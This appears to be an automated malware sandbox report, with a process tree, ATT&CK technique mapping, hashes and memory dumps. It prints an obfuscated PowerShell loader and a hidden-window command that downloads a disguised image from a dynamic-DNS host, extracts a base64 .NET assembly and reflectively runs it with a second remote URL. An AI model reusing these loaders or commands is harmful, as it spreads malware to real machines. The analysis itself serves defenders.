⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷YQBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Ng⤏ ꒼ ⛲ ⫰ 〷0⤏ ꒼ ⛲ ⫰ 〷EM⤏ ꒼ ⛲ ⫰ 〷bwBt⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷V⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷FM⤏ ꒼ ⛲ ⫰ 〷dQBi⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷By⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBn⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷YQBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Ng⤏ ꒼ ⛲ ⫰ 〷0⤏ ꒼ ⛲ ⫰ 〷Ew⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bo⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷YwBv⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷bQBh⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BC⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷WwBT⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQ⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷EM⤏ ꒼ ⛲ ⫰ 〷bwBu⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷ZQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷XQ⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷Do⤏ ꒼ ⛲ ⫰ 〷RgBy⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQBC⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷cwBl⤏ ꒼ ⛲ ⫰ 〷DY⤏ ꒼ ⛲ ⫰ 〷N⤏ ꒼ ⛲ ⫰ 〷BT⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷cgBp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷YgBh⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷ZQ⤏ ꒼ ⛲ ⫰ 〷2⤏ ꒼ ⛲ ⫰ 〷DQ⤏ ꒼ ⛲ ⫰ 〷QwBv⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷bQBh⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷bwBh⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBk⤏ ꒼ ⛲ ⫰ 〷EE⤏ ꒼ ⛲ ⫰ 〷cwBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQBi⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷eQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷Bb⤏ ꒼ ⛲ ⫰ 〷FM⤏ ꒼ ⛲ ⫰ 〷eQBz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷ZQBt⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷UgBl⤏ ꒼ ⛲ ⫰ 〷GY⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bg⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷EE⤏ ꒼ ⛲ ⫰ 〷cwBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQBi⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷eQBd⤏ ꒼ ⛲ ⫰ 〷Do⤏ ꒼ ⛲ ⫰ 〷OgBM⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bj⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQBt⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷bgBk⤏ ꒼ ⛲ ⫰ 〷EI⤏ ꒼ ⛲ ⫰ 〷eQB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷cw⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷eQBw⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BB⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷cwBl⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YgBs⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷LgBH⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BU⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷c⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷JwBk⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷LgBJ⤏ ꒼ ⛲ ⫰ 〷E8⤏ ꒼ ⛲ ⫰ 〷LgBI⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQBl⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷7⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bt⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bo⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷eQBw⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷LgBH⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BN⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bo⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷VgBB⤏ ꒼ ⛲ ⫰ 〷Ek⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷bwBr⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷K⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷dQBs⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷L⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Fs⤏ ꒼ ⛲ ⫰ 〷bwBi⤏ ꒼ ⛲ ⫰ 〷Go⤏ ꒼ ⛲ ⫰ 〷ZQBj⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷WwBd⤏ ꒼ ⛲ ⫰ 〷F0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷B4⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷LgBO⤏ ꒼ ⛲ ⫰ 〷E4⤏ ꒼ ⛲ ⫰ 〷Sg⤏ ꒼ ⛲ ⫰ 〷v⤏ ꒼ ⛲ ⫰ 〷D⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷M⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷x⤏ ꒼ ⛲ ⫰ 〷C8⤏ ꒼ ⛲ ⫰ 〷M⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷1⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷OQ⤏ ꒼ ⛲ ⫰ 〷4⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷M⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷5⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷NQ⤏ ꒼ ⛲ ⫰ 〷0⤏ ꒼ ⛲ ⫰ 〷C8⤏ ꒼ ⛲ ⫰ 〷Lw⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷H⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷Gg⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBz⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBz⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBz⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷s⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷UgBl⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷QQBz⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷s⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷YQB0⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷dgBh⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷bw⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷H0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷B9⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⤏ ꒼ ⛲ ⫰ 〷','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NNJ/001/05.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VZM3S9Z7LNWRFXC9EMPS.temp

Filesize
7KB

MD5
c7d45aaedb6365a387974dde0c63659e

SHA1
74ea3e60bafa9eec8dd95dbecbacdf201502838b

SHA256
b656ba0d594a082cc6ebed60b708a69bab0826d4f625c5a57c8e7952fe9b43ea

SHA512
55ce4f4c8c252cc4bd26c4ac79e8ae8057869d18fba20671558379adaf22aa754754736e00fbcac5a6796feee4b218703311be3df0763e080d41f4cd1ea8fb8a

Download Submit
memory/1976-15-0x000000001CBB0000-0x000000001CCD2000-memory.dmp

Filesize
1.1MB

Download
memory/2320-4-0x000007FEF5C4E000-0x000007FEF5C4F000-memory.dmp

Filesize
4KB

Download
memory/2320-5-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/2320-6-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

Filesize
9.6MB

Download
memory/2320-7-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

Filesize
9.6MB

Download
memory/2320-8-0x0000000001D10000-0x0000000001D18000-memory.dmp

Filesize
32KB

Download
memory/2320-9-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

Filesize
9.6MB

Download
memory/2320-16-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing